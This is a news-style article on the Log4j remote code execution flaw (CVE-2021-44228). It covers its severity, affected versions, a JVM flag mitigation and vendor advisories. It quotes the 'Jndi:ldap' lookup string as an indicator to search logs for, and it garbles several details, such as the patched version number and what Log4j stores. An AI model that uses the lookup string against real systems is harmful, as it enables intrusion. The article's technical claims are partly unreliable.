Java is a popular programming language used in many instances and devices. It's the programming language behind many things, doing many things.
Among the reasons, is because Java is so platform independence. Java can run on several different types of computer; as long as the computer has a Java Runtime Environment (JRE) installed, a Java program can run on it.
In other words, most types of computers should be able to run Java, including PCs running Windows, Mac computers, Unix or Linux computers, to mainframe computers, as well as mobile devices, IoT devices, and more.
And when a bug is found in the programming language, it can send a ripple so big that it can disrupt pretty much everything.
And the 'Log4j' bug is one that forced the internet to scramble for fix.
The bug is so critical and severe, simply because Log4j is a logging tool for Java.
The tool is flexible and powerful, and is essentially used in almost all Java apps out in the wild. This is because the logging tool is needed to record almost all activities that occur when a Java software is running, which allows developers to go back and fix the inevitable problems that crop up.
Because Log4j is used in almost all apps, even those made by some of the largest tech companies in the world, security researchers and officials, including the director of cybersecurity at the National Security Agency (NSA), sounded the alarm.
Tracked as CVE-2021-44228, the vulnerability is classed as severe, with CVSS score of 10, the highest possible severity rating.
The issue is so severe because Log4j stores a treasure trove of critical data.
And the bug here, allow hackers to get a glimpse of all sensitive information, as well as allowing malicious actors to take remote control of targets' devices through unauthenticated remote code execution when the user runs the application utilizes the Java logging library.
This is possible because Log4j does a poor job of "sanitizing" the data that it takes in, allowing attackers to sneak in their malicious code inside the log.
It is reported that the bug is already being exploited in the wild.
Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java.
The flaw was first detected in Minecraft, which is owned by Microsoft. But researchers warned that cloud applications are also vulnerable, because practically anything that uses Apache Struts is "likely vulnerable."
Organizations can identify if they're affected by examining the log files for any services using affected Log4j versions.
If they contain user-controlled strings, CERT-NZ uses the example of Jndi:ldap, they could be affected.
Before a patch can be properly implemented, users should switch log4j2.formatMsgNoLookups to true by adding:‐Dlog4j2.formatMsgNoLookups=True to the JVM command for starting the application.
In its advisory, as of Log4j 2.0.15 (released on December 6th), the vulnerable configurations have been disabled by default.
Apache has detailed the flaw on its Log4j2 vulnerabilities page, and credited Chen Zhaojun from Alibaba Cloud Security Team.
Minecraft has published an advisory that said the company had addressed the Log4j 2 vulnerability, but urged players and Minecraft server hosts to take additional steps to protect themselves.